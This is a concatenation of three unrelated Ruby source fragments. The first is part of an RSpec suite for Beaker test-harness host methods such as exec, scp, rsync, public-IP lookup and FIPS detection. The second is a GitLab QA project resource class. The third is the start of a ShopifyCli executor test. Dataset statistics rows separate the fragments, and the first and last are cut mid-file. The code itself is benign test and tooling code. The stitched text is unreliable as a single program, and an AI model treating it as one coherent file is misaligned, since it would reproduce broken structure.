end
describe "windows hosts" do
describe "install_package" do
let(:cygwin) { 'setup-x86.exe' }
let(:cygwin64) { 'setup-x86_64.exe' }
let(:package) { 'foo' }
context "testing osarchitecture" do
context "64 bit" do
before do
@platform = Beaker::Platform.new('windows-2008r2-64')
end
it "uses 64 bit cygwin" do
expect( host ).to receive(:execute).with(/#{cygwin64}.*#{package}/)
host.install_package(package)
end
end
context "32 bit" do
before do
@platform = Beaker::Platform.new('windows-10ent-32')
end
it "uses 32 bit cygwin" do
expect( host ).to receive(:execute).with(/#{cygwin}.*#{package}/)
host.install_package(package)
end
end
end
end
end
describe "#add_env_var" do
it "does nothing if the key/value pair already exists" do
result = Beaker::Result.new(host, '')
result.exit_code = 0
expect( Beaker::Command ).to receive(:new).with("grep ^key=.*\\/my\\/first\\/value ~/.ssh/environment")
expect( host ).to receive(:exec).once.and_return(result)
host.add_env_var('key', '/my/first/value')
end
it "adds new line to environment file if no env var of that name already exists" do
result = Beaker::Result.new(host, '')
result.exit_code = 1
expect( Beaker::Command ).to receive(:new).with("grep ^key=.*\\/my\\/first\\/value ~/.ssh/environment")
expect( host ).to receive(:exec).and_return(result)
expect( Beaker::Command ).to receive(:new).with(/grep \^key= ~\/\.ssh\/environment/)
expect( host ).to receive(:exec).and_return(result)
expect( Beaker::Command ).to receive(:new).with("echo \"key=/my/first/value\" >> ~/.ssh/environment")
host.add_env_var('key', '/my/first/value')
end
it "updates existing line in environment file when adding additional value to existing variable" do
result = Beaker::Result.new(host, '')
result.exit_code = 1
expect( Beaker::Command ).to receive(:new).with("grep ^key=.*\\/my\\/first\\/value ~/.ssh/environment")
expect( host ).to receive(:exec).and_return(result)
result = Beaker::Result.new(host, '')
result.exit_code = 0
expect( Beaker::Command ).to receive(:new).with(/grep \^key= ~\/\.ssh\/environment/)
expect( host ).to receive(:exec).and_return(result)
expect( Beaker::SedCommand ).to receive(:new).with('unix', 's/^key=/key=\\/my\\/first\\/value:/', '~/.ssh/environment')
host.add_env_var('key', '/my/first/value')
end
end
describe "#delete_env_var" do
it "deletes env var" do
expect( Beaker::SedCommand ).to receive(:new).with('unix', '/key=\\/my\\/first\\/value$/d', '~/.ssh/environment')
expect( Beaker::SedCommand ).to receive(:new).with("unix", "s/key=\\(.*\\)[;:]\\/my\\/first\\/value/key=\\1/", "~/.ssh/environment")
expect( Beaker::SedCommand ).to receive(:new).with("unix", "s/key=\\/my\\/first\\/value[;:]/key=/", "~/.ssh/environment")
host.delete_env_var('key', '/my/first/value')
end
end
describe "executing commands" do
let(:command) { Beaker::Command.new('ls') }
let(:host) { Beaker::Host.create('host', {}, make_host_opts('host', options.merge(platform))) }
let(:result) { Beaker::Result.new(host, 'ls') }
before :each do
result.stdout = 'stdout'
result.stderr = 'stderr'
logger = double(:logger)
allow( logger ).to receive(:host_output)
allow( logger ).to receive(:debug)
allow( logger ).to receive(:with_indent) { |&block| block.call }
host.instance_variable_set :@logger, logger
conn = double(:connection)
allow( conn ).to receive(:execute).and_return(result)
allow( conn ).to receive(:ip).and_return(host['ip'])
allow( conn ).to receive(:vmhostname).and_return(host['vmhostname'])
allow( conn ).to receive(:hostname).and_return(host.name)
host.instance_variable_set :@connection, conn
end
it 'takes a command object and a hash of options' do
result.exit_code = 0
expect{ host.exec(command, {}) }.to_not raise_error
end
it 'acts on the host\'s logger and connection object' do
result.exit_code = 0
expect( host.instance_variable_get(:@logger) ).to receive(:debug).at_least(1).times
expect( host.instance_variable_get(:@connection) ).to receive(:execute).once
host.exec(command)
end
it 'returns the result object' do
result.exit_code = 0
expect( host.exec(command) ).to be === result
end
it 'logs the amount of time spent executing the command' do
result.exit_code = 0
expect(host.logger).to receive(:debug).with(/executed in \d\.\d{2} seconds/)
host.exec(command,{})
end
it 'raises a CommandFailure when an unacceptable exit code is returned' do
result.exit_code = 7
opts = { :acceptable_exit_codes => [0, 1] }
expect { host.exec(command, opts) }.to raise_error(Beaker::Host::CommandFailure)
end
it 'raises a CommandFailure when an unacceptable exit code is returned and the accept_all_exit_codes flag is set to false' do
result.exit_code = 7
opts = {
:acceptable_exit_codes => [0, 1],
:accept_all_exit_codes => false
}
expect { host.exec(command, opts) }.to raise_error(Beaker::Host::CommandFailure)
end
it 'does throw an error when an unacceptable exit code is returned and the accept_all_exit_codes flag is set' do
result.exit_code = 7
opts = {
:acceptable_exit_codes => [0, 1],
:accept_all_exit_codes => true
}
allow( host.logger ).to receive( :warn )
expect { host.exec(command, opts) }.to raise_error
end
it 'sends a warning when both :acceptable_exit_codes & :accept_all_exit_codes are set' do
result.exit_code = 1
opts = {
:acceptable_exit_codes => [0, 1],
:accept_all_exit_codes => true
}
expect( host.logger ).to receive( :warn ).with( /overrides/ )
expect { host.exec(command, opts) }.to_not raise_error
end
it 'explicitly closes the connection when :reset_connection is set' do
expect( host ).to receive( :close )
expect { host.exec(command, :reset_connection => true) }.to_not raise_error
end
context "controls the result objects logging" do
it "and passes a test if the exit_code doesn't match the default :acceptable_exit_codes of 0" do
result.exit_code = 0
expect{ host.exec(command,{}) }.to_not raise_error
end
it "and fails a test if the exit_code doesn't match the default :acceptable_exit_codes of 0" do
result.exit_code = 1
expect{ host.exec(command,{}) }.to raise_error
end
it "and passes a test if the exit_code matches :acceptable_exit_codes" do
result.exit_code = 0
expect{ host.exec(command,{:acceptable_exit_codes => 0}) }.to_not raise_error
end
it "and fails a test if the exit_code doesn't match :acceptable_exit_codes" do
result.exit_code = 0
expect{ host.exec(command,{:acceptable_exit_codes => 1}) }.to raise_error
end
it "and passes a test if the exit_code matches one of the :acceptable_exit_codes" do
result.exit_code = 127
expect{ host.exec(command,{:acceptable_exit_codes => [1,127]}) }.to_not raise_error
end
it "and passes a test if the exit_code matches one of the range of :acceptable_exit_codes" do
result.exit_code = 1
expect{ host.exec(command,{:acceptable_exit_codes => (0..127)}) }.to_not raise_error
end
end
end
describe "#mkdir_p" do
it "does the right thing on a bash host, identified as is_cygwin=true" do
@options = {:is_cygwin => true}
@platform = 'windows'
result = double
allow( result ).to receive( :exit_code ).and_return( 0 )
allow( host ).to receive( :exec ).and_return( result )
expect( Beaker::Command ).to receive(:new).with("mkdir -p test/test/test")
expect( host.mkdir_p('test/test/test') ).to be == true
end
it "does the right thing on a bash host, identified as is_cygwin=nil" do
@options = {:is_cygwin => nil}
@platform = 'windows'
result = double
allow( result ).to receive( :exit_code ).and_return( 0 )
allow( host ).to receive( :exec ).and_return( result )
expect( Beaker::Command ).to receive(:new).with("mkdir -p test/test/test")
expect( host.mkdir_p('test/test/test') ).to be == true
end
it "does the right thing on a non-bash host, identified as is_cygwin=false (powershell)" do
@options = {:is_cygwin => false}
@platform = 'windows'
result = double
allow( result ).to receive( :exit_code ).and_return( 0 )
allow( host ).to receive( :exec ).and_return( result )
expect( Beaker::Command ).to receive(:new).with("if not exist test\\test\\test (md test\\test\\test)")
expect( host.mkdir_p('test/test/test') ).to be == true
end
end
describe "#touch" do
it "generates the right absolute command for a windows host" do
@platform = 'windows'
expect( host.touch('touched_file') ).to be == "c:\\\\windows\\\\system32\\\\cmd.exe /c echo. 2> touched_file"
end
['centos','redhat'].each do |platform|
it "generates the right absolute command for a #{platform} host" do
@platform = platform
expect( host.touch('touched_file') ).to be == "/bin/touch touched_file"
end
end
it "generates the right absolute command for an osx host" do
@platform = 'osx'
expect( host.touch('touched_file') ).to be == "/usr/bin/touch touched_file"
end
end
context 'do_scp_to' do
# it takes a location and a destination
# it basically proxies that to the connection object
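# For reference, a minimal call-shape sketch (the local path below is an
# illustrative assumption, not a fixture used by these examples):
#
#   host.do_scp_to('/tmp/local_file', '/remote/target', {})
#   # => Beaker::Result, produced by the connection object's #scp_to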
it 'do_scp_to logs info and proxies to the connection' do
create_files(['source'])
logger = host[:logger]
conn = double(:connection)
@options = { :logger => logger }
host.instance_variable_set :@connection, conn
args = [ '/source', 'target', {} ]
conn_args = args
expect( logger ).to receive(:trace)
expect( conn ).to receive(:scp_to).with( *conn_args ).and_return(Beaker::Result.new(host, 'output!'))
allow( conn ).to receive(:ip).and_return(host['ip'])
allow( conn ).to receive(:vmhostname).and_return(host['vmhostname'])
allow( conn ).to receive(:hostname).and_return(host.name)
host.do_scp_to *args
end
it 'calls for host scp post operations after SCPing happens' do
create_files(['source'])
logger = host[:logger]
conn = double(:connection)
@options = { :logger => logger }
host.instance_variable_set :@connection, conn
args = [ '/source', 'target', {} ]
conn_args = args
allow( logger ).to receive(:trace)
expect( conn ).to receive(:scp_to).ordered.with(
*conn_args
).and_return(Beaker::Result.new(host, 'output!'))
allow( conn ).to receive(:ip).and_return(host['ip'])
allow( conn ).to receive(:vmhostname).and_return(host['vmhostname'])
allow( conn ).to receive(:hostname).and_return(host.name)
expect( host ).to receive( :scp_post_operations ).ordered
host.do_scp_to *args
end
it 'throws an IOError when the file given doesn\'t exist' do
expect { host.do_scp_to "/does/not/exist", "does/not/exist/over/there", {} }.to raise_error(IOError)
end
context "using an ignore array with an absolute source path" do
let( :source_path ) { '/repos/puppetlabs-inifile' }
let( :target_path ) { '/etc/puppetlabs/modules/inifile' }
before :each do
test_dir = "#{source_path}/tests"
other_test_dir = "#{source_path}/tests2"
files = [
'00_EnvSetup.rb', '035_StopFirewall.rb', '05_HieraSetup.rb',
'01_TestSetup.rb', '03_PuppetMasterSanity.rb',
'06_InstallModules.rb','02_PuppetUserAndGroup.rb',
'04_ValidateSignCert.rb', '07_InstallCACerts.rb' ]
@fileset1 = files.shuffle.map {|file| test_dir + '/' + file }
@fileset2 = files.shuffle.map {|file| other_test_dir + '/' + file }
create_files( @fileset1 )
create_files( @fileset2 )
end
it 'can take an ignore list that excludes all files and not call scp_to' do
logger = host[:logger]
conn = double(:connection)
@options = { :logger => logger }
host.instance_variable_set :@connection, conn
args = [ source_path, target_path, {:ignore => ['tests', 'tests2']} ]
expect( logger ).to receive(:trace)
expect( host ).to receive( :mkdir_p ).exactly(0).times
expect( conn ).to receive(:scp_to).exactly(0).times
host.do_scp_to *args
end
it 'can take an ignore list that excludes a single file and scp the rest' do
created_target_path = File.join(target_path, File.basename(source_path))
exclude_file = '07_InstallCACerts.rb'
logger = host[:logger]
conn = double(:connection)
@options = { :logger => logger }
host.instance_variable_set :@connection, conn
args = [ source_path, target_path, {:ignore => [exclude_file], :dry_run => false} ]
allow( Dir ).to receive( :glob ).and_return( @fileset1 + @fileset2 )
expect( logger ).to receive(:trace)
expect( host ).to receive( :mkdir_p ).with("#{created_target_path}/tests")
expect( host ).to receive( :mkdir_p ).with("#{created_target_path}/tests2")
(@fileset1 + @fileset2).each do |file|
if file !~ /#{exclude_file}/
file_args = [ file, File.join(created_target_path, File.dirname(file).gsub(source_path,'')), {:ignore => [exclude_file], :dry_run => false} ]
conn_args = file_args
expect( conn ).to receive(:scp_to).with( *conn_args ).and_return(Beaker::Result.new(host, 'output!'))
else
file_args = [ file, File.join(created_target_path, File.dirname(file).gsub(source_path,'')), {:ignore => [exclude_file], :dry_run => false} ]
conn_args = file_args
expect( conn ).to_not receive(:scp_to).with( *conn_args )
end
end
allow( conn ).to receive(:ip).and_return(host['ip'])
allow( conn ).to receive(:vmhostname).and_return(host['vmhostname'])
allow( conn ).to receive(:hostname).and_return(host.name)
host.do_scp_to *args
end
end
context "using an ignore array with an absolute source path in host root" do
let( :source_path ) { '/puppetlabs-inifile' }
let( :target_path ) { '/etc/puppetlabs/modules/inifile' }
before :each do
test_dir = "#{source_path}/tests"
other_test_dir = "#{source_path}/tests/tests2"
another_test_dir = "#{source_path}/tests/tests3"
files = [
'00_EnvSetup.rb', '035_StopFirewall.rb', '05_HieraSetup.rb',
'01_TestSetup.rb', '03_PuppetMasterSanity.rb',
'06_InstallModules.rb','02_PuppetUserAndGroup.rb',
'04_ValidateSignCert.rb', '07_InstallCACerts.rb' ]
@fileset1 = files.shuffle.map {|file| test_dir + '/' + file }
@fileset2 = files.shuffle.map {|file| other_test_dir + '/' + file }
@fileset3 = files.shuffle.map {|file| another_test_dir + '/' + file }
create_files( @fileset1 )
create_files( @fileset2 )
create_files( @fileset3 )
end
it "should create target dirs with correct path seperator" do
create_files(['source'])
exclude_file = '04_ValidateSignCert.rb'
logger = host[:logger]
conn = double(:connection)
@options = { :logger => logger }
host.instance_variable_set :@connection, conn
args = [ source_path, target_path, {:ignore => [exclude_file]} ]
conn_args = args
allow( Dir ).to receive( :glob ).and_return( @fileset1 + @fileset2 + @fileset3)
created_target_path = File.join(target_path, File.basename(source_path))
expect( host ).to receive( :mkdir_p ).with("#{created_target_path}/tests")
expect( host ).to receive( :mkdir_p ).with("#{created_target_path}/tests/tests2")
expect( host ).to receive( :mkdir_p ).with("#{created_target_path}/tests/tests3")
(@fileset1 + @fileset2 + @fileset3).each do |file|
if file !~ /#{exclude_file}/
file_args = [ file, File.join(created_target_path, File.dirname(file).gsub(source_path,'')), {:ignore => [exclude_file], :dry_run => false} ]
conn_args = file_args
expect( conn ).to receive(:scp_to).with( *conn_args ).and_return(Beaker::Result.new(host, 'output!'))
else
file_args = [ file, File.join(created_target_path, File.dirname(file).gsub(source_path,'')), {:ignore => [exclude_file], :dry_run => false} ]
conn_args = file_args
expect( conn ).to_not receive(:scp_to).with( *conn_args )
end
end
allow( conn ).to receive(:ip).and_return(host['ip'])
allow( conn ).to receive(:vmhostname).and_return(host['vmhostname'])
allow( conn ).to receive(:hostname).and_return(host.name)
host.do_scp_to *args
end
end
context "using an ignore array" do
before :each do
test_dir = 'tmp/tests'
other_test_dir = 'tmp/tests2'
files = [
'00_EnvSetup.rb', '035_StopFirewall.rb', '05_HieraSetup.rb',
'01_TestSetup.rb', '03_PuppetMasterSanity.rb',
'06_InstallModules.rb','02_PuppetUserAndGroup.rb',
'04_ValidateSignCert.rb', '07_InstallCACerts.rb' ]
@fileset1 = files.shuffle.map {|file| test_dir + '/' + file }
@fileset2 = files.shuffle.map {|file| other_test_dir + '/' + file }
create_files( @fileset1 )
create_files( @fileset2 )
end
it 'can take an ignore list that excludes all files and not call scp_to' do
logger = host[:logger]
conn = double(:connection)
@options = { :logger => logger }
host.instance_variable_set :@connection, conn
args = [ 'tmp', 'target', {:ignore => ['tests', 'tests2']} ]
expect( logger ).to receive(:trace)
expect( host ).to receive( :mkdir_p ).exactly(0).times
expect( conn ).to receive(:scp_to).exactly(0).times
host.do_scp_to *args
end
it 'can take an ignore list that excludes a single file and scp the rest' do
exclude_file = '07_InstallCACerts.rb'
logger = host[:logger]
conn = double(:connection)
@options = { :logger => logger }
host.instance_variable_set :@connection, conn
args = [ 'tmp', 'target', {:ignore => [exclude_file], :dry_run => false} ]
allow( Dir ).to receive( :glob ).and_return( @fileset1 + @fileset2 )
expect( logger ).to receive(:trace)
expect( host ).to receive( :mkdir_p ).with('target/tmp/tests')
expect( host ).to receive( :mkdir_p ).with('target/tmp/tests2')
(@fileset1 + @fileset2).each do |file|
if file !~ /#{exclude_file}/
file_args = [ file, File.join('target', File.dirname(file)), {:ignore => [exclude_file], :dry_run => false} ]
conn_args = file_args
expect( conn ).to receive(:scp_to).with( *conn_args ).and_return(Beaker::Result.new(host, 'output!'))
else
file_args = [ file, File.join('target', File.dirname(file)), {:ignore => [exclude_file], :dry_run => false} ]
conn_args = file_args
expect( conn ).to_not receive(:scp_to).with( *conn_args )
end
end
allow( conn ).to receive(:ip).and_return(host['ip'])
allow( conn ).to receive(:vmhostname).and_return(host['vmhostname'])
allow( conn ).to receive(:hostname).and_return(host.name)
host.do_scp_to *args
end
it 'can take an ignore list that excludes a dir and scp the rest' do
exclude_file = 'tests'
logger = host[:logger]
conn = double(:connection)
@options = { :logger => logger }
host.instance_variable_set :@connection, conn
args = [ 'tmp', 'target', {:ignore => [exclude_file], :dry_run => false} ]
allow( Dir ).to receive( :glob ).and_return( @fileset1 + @fileset2 )
expect( logger ).to receive(:trace)
expect( host ).to_not receive( :mkdir_p ).with('target/tmp/tests')
expect( host ).to receive( :mkdir_p ).with('target/tmp/tests2')
(@fileset1).each do |file|
file_args = [ file, File.join('target', File.dirname(file)), {:ignore => [exclude_file], :dry_run => false} ]
conn_args = file_args
expect( conn ).to_not receive(:scp_to).with( *conn_args )
end
(@fileset2).each do |file|
file_args = [ file, File.join('target', File.dirname(file)), {:ignore => [exclude_file], :dry_run => false} ]
conn_args = file_args
expect( conn ).to receive(:scp_to).with( *conn_args ).and_return(Beaker::Result.new(host, 'output!'))
end
allow( conn ).to receive(:ip).and_return(host['ip'])
allow( conn ).to receive(:vmhostname).and_return(host['vmhostname'])
allow( conn ).to receive(:hostname).and_return(host.name)
host.do_scp_to *args
end
end
end
context 'do_scp_from' do
it 'do_scp_from logs info and proxies to the connection' do
logger = host[:logger]
conn = double(:connection)
@options = { :logger => logger }
host.instance_variable_set :@connection, conn
args = [ 'source', 'target', {} ]
conn_args = args
expect( logger ).to receive(:debug)
expect( conn ).to receive(:scp_from).with( *conn_args ).and_return(Beaker::Result.new(host, 'output!'))
allow( conn ).to receive(:ip).and_return(host['ip'])
allow( conn ).to receive(:vmhostname).and_return(host['vmhostname'])
allow( conn ).to receive(:hostname).and_return(host.name)
host.do_scp_from *args
end
end
context 'do_rsync_to' do
it 'do_rsync_to logs info and call Rsync class' do
create_files(['source'])
logger = host[:logger]
@options = { :logger => logger }
args = [ 'source', 'target', {:ignore => ['.bundle']} ]
key = host['ssh']['keys'].first
expect( File ).to receive( :exist? ).with( key ).and_return true
rsync_args = [ 'source', 'target', ['-az', "-e \"ssh -i #{key} -p 22 -o 'StrictHostKeyChecking no'\"", "--exclude '.bundle'"] ]
expect( host ).to receive(:reachable_name).and_return('default.ip.address')
expect( Rsync ).to receive(:run).with( *rsync_args ).and_return(Rsync::Result.new('raw rsync output', 0))
host.do_rsync_to *args
expect(Rsync.host).to eq('[email protected]')
end
it 'throws an IOError when the file given doesn\'t exist' do
expect { host.do_rsync_to "/does/not/exist", "does/not/exist/over/there", {} }.to raise_error(IOError)
end
it 'uses the ssh config file' do
@options = {'ssh' => {:config => '/var/folders/v0/centos-64-x6420150625-48025-lu3u86'}}
create_files(['source'])
args = [ 'source', 'target',
{:ignore => ['.bundle']} ]
# since we're using fakefs we need to create the file and directories
FileUtils.mkdir_p('/var/folders/v0/')
FileUtils.touch('/var/folders/v0/centos-64-x6420150625-48025-lu3u86')
rsync_args = [ 'source', 'target', ['-az', "-e \"ssh -F /var/folders/v0/centos-64-x6420150625-48025-lu3u86 -o 'StrictHostKeyChecking no'\"", "--exclude '.bundle'"] ]
expect(Rsync).to receive(:run).with(*rsync_args).and_return(Rsync::Result.new('raw rsync output', 0))
expect(host.do_rsync_to(*args).success?).to eq(true)
end
it 'does not use the ssh config file when config does not exist' do
@options = {'ssh' => {:config => '/var/folders/v0/centos-64-x6420150625-48025-lu3u86'}}
create_files(['source'])
args = [ 'source', 'target',
{:ignore => ['.bundle']} ]
rsync_args = [ 'source', 'target', ['-az', "-e \"ssh -o 'StrictHostKeyChecking no'\"", "--exclude '.bundle'"] ]
expect(Rsync).to receive(:run).with(*rsync_args).and_return(Rsync::Result.new('raw rsync output', 0))
expect(host.do_rsync_to(*args).success?).to eq(true)
end
it "doesn't corrupt :ignore option" do
create_files(['source'])
ignore_list = ['.bundle']
args = ['source', 'target', {:ignore => ignore_list}]
key = host['ssh']['keys'].first
expect( File ).to receive( :exist? ).with( key ).twice.and_return true
rsync_args = ['source', 'target', ['-az', "-e \"ssh -i #{key} -p 22 -o 'StrictHostKeyChecking no'\"", "--exclude '.bundle'"]]
expect(Rsync).to receive(:run).twice.with(*rsync_args).and_return(Rsync::Result.new('raw rsync output', 0))
host.do_rsync_to *args
host.do_rsync_to *args
end
end
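# For context, the Rsync invocation exercised above has this shape (the -e flag
# shown is the one stubbed in these examples and depends on the host's ssh
# settings; Rsync.host is set separately from the host's reachable name):
#
#   Rsync.run('source', 'target',
#             ['-az', "-e \"ssh -i #{key} -p 22 -o 'StrictHostKeyChecking no'\"", "--exclude '.bundle'"])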
it 'interpolates to its "name"' do
expect( "#{host}" ).to be === 'name'
end
describe 'host close' do
context 'with a nil connection object' do
before do
conn = nil
host.instance_variable_set :@connection, conn
allow(host).to receive(:close).and_call_original
end
it 'does not raise an error' do
expect { host.close }.to_not raise_error
end
end
end
describe '#get_public_ip' do
let (:aws) { double('AWSmock')}
it 'calls upon the ec2 instance to get the ip address' do
host.host_hash[:hypervisor] = 'ec2'
host.host_hash[:instance] = aws
expect(aws).to receive(:ip_address)
host.get_public_ip
end
it 'call upon openstack host to get the ip address' do
host.host_hash[:hypervisor] = 'openstack'
expect(host.get_public_ip).to be(host.host_hash[:ip])
end
it 'returns nil when no matching hypervisor is found' do
host.host_hash[:hypervisor] = 'vmpooler'
expect(host.get_public_ip).to be(nil)
end
it 'calls execute with curl if the host_hash[:instance] is not defined for ec2 and the host is not an instance of Windows::Host' do
host.host_hash[:hypervisor] = 'ec2'
host.host_hash[:instance] = nil
expect(host).to receive(:instance_of?).with(Windows::Host).and_return(false)
expect(host).to receive(:execute).with("curl http://169.254.169.254/latest/meta-data/public-ipv4").and_return('127.0.0.1')
host.get_public_ip
end
it 'calls execute with wget if the host_hash[:instance] is not defined for ec2 and the host is an instance of Windows::Host' do
host.host_hash[:hypervisor] = 'ec2'
host.host_hash[:instance] = nil
expect(host).to receive(:instance_of?).with(Windows::Host).and_return(true)
expect(host).to receive(:execute).with("wget http://169.254.169.254/latest/meta-data/public-ipv4").and_return('127.0.0.1')
host.get_public_ip
end
it 'calls execute with curl if the host_hash[:ip] is not defined for openstack and the host is not an instance of Windows::Host' do
host.host_hash[:hypervisor] = 'openstack'
host.host_hash[:ip] = nil
expect(host).to receive(:instance_of?).with(Windows::Host).and_return(false)
expect(host).to receive(:execute).with("curl http://169.254.169.254/latest/meta-data/public-ipv4").and_return('127.0.0.1')
host.get_public_ip
end
it 'calls execute with wget if the host_hash[:ip] is not defined for openstack and the host is an instance of Windows::Host' do
host.host_hash[:hypervisor] = 'openstack'
host.host_hash[:ip] = nil
expect(host).to receive(:instance_of?).with(Windows::Host).and_return(true)
expect(host).to receive(:execute).with("wget http://169.254.169.254/latest/meta-data/public-ipv4").and_return('127.0.0.1')
host.get_public_ip
end
end
describe '#ip' do
it 'calls #get_ip when get_public_ip returns nil' do
allow( host ).to receive(:get_public_ip).and_return(nil)
expect(host).to receive(:get_ip).and_return('127.0.0.2')
expect(host.ip).to eq('127.0.0.2')
end
it 'does not call get_ip when #get_public_ip returns an address' do
allow( host ).to receive(:get_public_ip).and_return('127.0.0.1')
expect(host).to_not receive(:get_ip)
expect(host.ip).to eq('127.0.0.1')
end
end
describe "#wait_for_port" do
it 'returns true when port is open' do
allow(host).to receive(:repeat_fibonacci_style_for).and_return(true)
expect(host.wait_for_port(22, 0)).to be true
end
it 'returns false when port is not open' do
allow(host).to receive(:repeat_fibonacci_style_for).and_return(false)
expect(host.wait_for_port(22, 0)).to be false
end
end
describe "#fips_mode?" do
it 'returns false on non-el7 hosts' do
@platform = 'windows'
expect(host.fips_mode?).to be false
end
it 'returns true when the `fips_enabled` file is present and contains "1"' do
@platform = 'el-7'
expect(host).to receive(:execute).with("cat /proc/sys/crypto/fips_enabled").and_return("1")
expect(host.fips_mode?).to be true
end
it 'returns false when the `fips_enabled` file is present and contains "0"' do
@platform = 'el-7'
expect(host).to receive(:execute).with("cat /proc/sys/crypto/fips_enabled").and_return("0")
expect(host.fips_mode?).to be false
end
end
end
end
| 40.747642 | 173 | 0.605574 |
28d0844e71cac82934d8a78013e12331d12c0497 | 8,162 | # frozen_string_literal: true
require 'securerandom'
module QA
module Resource
class Project < Base
include Events::Project
include Members
include Visibility
attr_accessor :repository_storage # requires admin access
attr_writer :initialize_with_readme
attr_writer :auto_devops_enabled
attr_writer :github_personal_access_token
attr_writer :github_repository_path
attribute :id
attribute :name
attribute :add_name_uuid
attribute :description
attribute :standalone
attribute :runners_token
attribute :visibility
attribute :template_name
attribute :import
attribute :group do
Group.fabricate!
end
attribute :path_with_namespace do
"#{sandbox_path}#{group.path}/#{name}" if group
end
alias_method :full_path, :path_with_namespace
def sandbox_path
group.respond_to?('sandbox') ? "#{group.sandbox.path}/" : ''
end
attribute :repository_ssh_location do
Page::Project::Show.perform do |show|
show.repository_clone_ssh_location
end
end
attribute :repository_http_location do
Page::Project::Show.perform do |show|
show.repository_clone_http_location
end
end
def initialize
@add_name_uuid = true
@standalone = false
@description = 'My awesome project'
@initialize_with_readme = false
@auto_devops_enabled = false
@visibility = :public
@template_name = nil
@import = false
self.name = "the_awesome_project"
end
def name=(raw_name)
@name = @add_name_uuid ? "#{raw_name}-#{SecureRandom.hex(8)}" : raw_name
end
def fabricate!
return if @import
unless @standalone
group.visit!
Page::Group::Show.perform(&:go_to_new_project)
end
if @template_name
QA::Flow::Project.go_to_create_project_from_template
Page::Project::New.perform do |new_page|
new_page.use_template_for_project(@template_name)
end
end
Page::Project::NewExperiment.perform(&:click_blank_project_link) if Page::Project::NewExperiment.perform(&:shown?)
Page::Project::New.perform do |new_page|
new_page.choose_test_namespace
new_page.choose_name(@name)
new_page.add_description(@description)
new_page.set_visibility(@visibility)
new_page.enable_initialize_with_readme if @initialize_with_readme
new_page.create_new_project
end
end
def fabricate_via_api!
resource_web_url(api_get)
rescue ResourceNotFoundError
super
end
def has_file?(file_path)
response = repository_tree
raise ResourceNotFoundError, "#{response[:message]}" if response.is_a?(Hash) && response.has_key?(:message)
response.any? { |file| file[:path] == file_path }
end
def has_branch?(branch)
has_branches?(Array(branch))
end
def has_branches?(branches)
branches.all? do |branch|
response = get(Runtime::API::Request.new(api_client, "#{api_repository_branches_path}/#{branch}").url)
response.code == HTTP_STATUS_OK
end
end
def has_tags?(tags)
tags.all? do |tag|
response = get(Runtime::API::Request.new(api_client, "#{api_repository_tags_path}/#{tag}").url)
response.code == HTTP_STATUS_OK
end
end
def api_get_path
"/projects/#{CGI.escape(path_with_namespace)}"
end
def api_visibility_path
"/projects/#{id}"
end
def api_get_archive_path(type = 'tar.gz')
"#{api_get_path}/repository/archive.#{type}"
end
def api_members_path
"#{api_get_path}/members"
end
def api_merge_requests_path
"#{api_get_path}/merge_requests"
end
def api_runners_path
"#{api_get_path}/runners"
end
def api_commits_path
"#{api_get_path}/repository/commits"
end
def api_repository_branches_path
"#{api_get_path}/repository/branches"
end
def api_repository_tags_path
"#{api_get_path}/repository/tags"
end
def api_repository_tree_path
"#{api_get_path}/repository/tree"
end
def api_pipelines_path
"#{api_get_path}/pipelines"
end
def api_put_path
"/projects/#{id}"
end
def api_post_path
'/projects'
end
def api_post_body
post_body = {
name: name,
description: description,
visibility: @visibility,
initialize_with_readme: @initialize_with_readme,
auto_devops_enabled: @auto_devops_enabled
}
unless @standalone
post_body[:namespace_id] = group.id
post_body[:path] = name
end
post_body[:repository_storage] = repository_storage if repository_storage
post_body[:template_name] = @template_name if @template_name
post_body
end
def api_delete_path
"/projects/#{id}"
end
def change_repository_storage(new_storage)
put_body = { repository_storage: new_storage }
response = put Runtime::API::Request.new(api_client, api_put_path).url, put_body
unless response.code == HTTP_STATUS_OK
raise ResourceUpdateFailedError, "Could not change repository storage to #{new_storage}. Request returned (#{response.code}): `#{response}`."
end
wait_until(sleep_interval: 1) { Runtime::API::RepositoryStorageMoves.has_status?(self, 'finished', new_storage) }
rescue Support::Repeater::RepeaterConditionExceededError
raise Runtime::API::RepositoryStorageMoves::RepositoryStorageMovesError, 'Timed out while waiting for the repository storage move to finish'
end
def commits
parse_body(get(Runtime::API::Request.new(api_client, api_commits_path).url))
end
def default_branch
reload!.api_response[:default_branch] || Runtime::Env.default_branch
end
def import_status
response = get Runtime::API::Request.new(api_client, "/projects/#{id}/import").url
unless response.code == HTTP_STATUS_OK
raise ResourceQueryError, "Could not get import status. Request returned (#{response.code}): `#{response}`."
end
result = parse_body(response)
Runtime::Logger.error("Import failed: #{result[:import_error]}") if result[:import_status] == "failed"
result[:import_status]
end
def merge_requests
parse_body(get(Runtime::API::Request.new(api_client, api_merge_requests_path).url))
end
def merge_request_with_title(title)
merge_requests.find { |mr| mr[:title] == title }
end
def runners(tag_list: nil)
response = if tag_list
get Runtime::API::Request.new(api_client, "#{api_runners_path}?tag_list=#{tag_list.compact.join(',')}").url
else
get Runtime::API::Request.new(api_client, "#{api_runners_path}").url
end
parse_body(response)
end
def repository_branches
parse_body(get(Runtime::API::Request.new(api_client, api_repository_branches_path).url))
end
def repository_tags
parse_body(get(Runtime::API::Request.new(api_client, api_repository_tags_path).url))
end
def repository_tree
parse_body(get(Runtime::API::Request.new(api_client, api_repository_tree_path).url))
end
def pipelines
parse_body(get(Runtime::API::Request.new(api_client, api_pipelines_path).url))
end
private
def transform_api_resource(api_resource)
api_resource[:repository_ssh_location] =
Git::Location.new(api_resource[:ssh_url_to_repo])
api_resource[:repository_http_location] =
Git::Location.new(api_resource[:http_url_to_repo])
api_resource
end
end
end
end
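# A usage sketch (hypothetical values, not part of this file) showing how such a
# resource is typically fabricated from a test:
#
#   QA::Resource::Project.fabricate_via_api! do |project|
#     project.name = 'my-project'
#     project.description = 'Created for an end-to-end test'
#     project.visibility = :private
#   end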
| 28.439024 | 151 | 0.640039 |
629bdb467e4c322ca8a9ca4a5b49e6aacab80c12 | 2,053 | require 'test_helper'
module ShopifyCli
module Core
class ExecutorTest < MiniTest::Test
include TestHelpers::FakeTask
class FakeCommand < ShopifyCli::Command
prerequisite_task :fake
class FakeSubCommand < ShopifyCli::SubCommand
prerequisite_task :fake
def call(*)
@ctx.puts('subcommand!')
end
end
subcommand :FakeSubCommand, 'fakesub'
options do |parser, flags|
parser.on('-v', '--verbose', 'print verbosely') do |v|
flags[:verbose] = v
end
end
def call(_args, _name)
if options.flags[:verbose]
@ctx.puts('verbose!')
else
